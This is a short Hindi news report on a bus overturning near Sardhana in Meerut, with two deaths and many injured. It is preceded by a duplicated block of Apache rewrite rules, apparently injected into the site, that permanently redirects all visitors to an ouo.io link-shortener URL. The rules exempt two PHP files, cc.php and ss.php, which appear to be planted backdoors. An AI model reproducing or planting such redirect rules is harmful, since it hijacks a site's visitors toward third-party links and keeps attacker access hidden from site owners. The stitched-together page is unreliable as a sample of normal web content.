
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 467
Nextमेरठ। सरधना रोड पर बाइक को बचाने के प्रयास में एक लो फ्लोर बस पलट गई। हादसे में एक व्यक्ति की मौत हो गई, जबकि एक ने हॉस्पिटल जाते समय रास्ते में ही दम तोड़ दिया। घटना में दो दर्जन से ज्यादा लोग गंभीर घायल हो गए। उन्हें अलग-अलग अस्पतालों में भर्ती कराया है। घटना मेरठ के थाना सरधना क्षेत्र के करनाल हाईवे की है। एक लो फ्लोर बस बाइक को बचाने के चक्कर में गड्ढे में जा कर पलट गई। बस में सवार लोग गंभीर रूप से घायल हो गए। घटना की सूचना मिलते ही पुलिस मौके पर पहुंची और रेस्क्यू ऑपरेशन शुरू कर दिया गया। घायल लोगों को निकालकर एंबुलेंस से अस्पताल भिजवाया गया। हादसे में 2 लोगों ने दम तोड़ दिया है। कई की हालत अभी गंभीर बनी हुई है। बाद में बीजेपी के सरधना विधायक संगीत सोम भी अस्पताल पहुंचे और हादसे पर दुख जताया। संगीत सोम ने बताया कि हादसे में 2 लोगो की मृत्यु हो चुकी है, जबकि दो दर्जन से ज्यादा लोग घायल हो गए। घायलों की हर संभव मदद की जाएगी। संगीत सोम के अनुसार किसी बाइक सवार को बचाने के चक्कर में बस अनियंत्रित हो गई थी, जिसके बाद पलट गई और ये हादसा हो गया।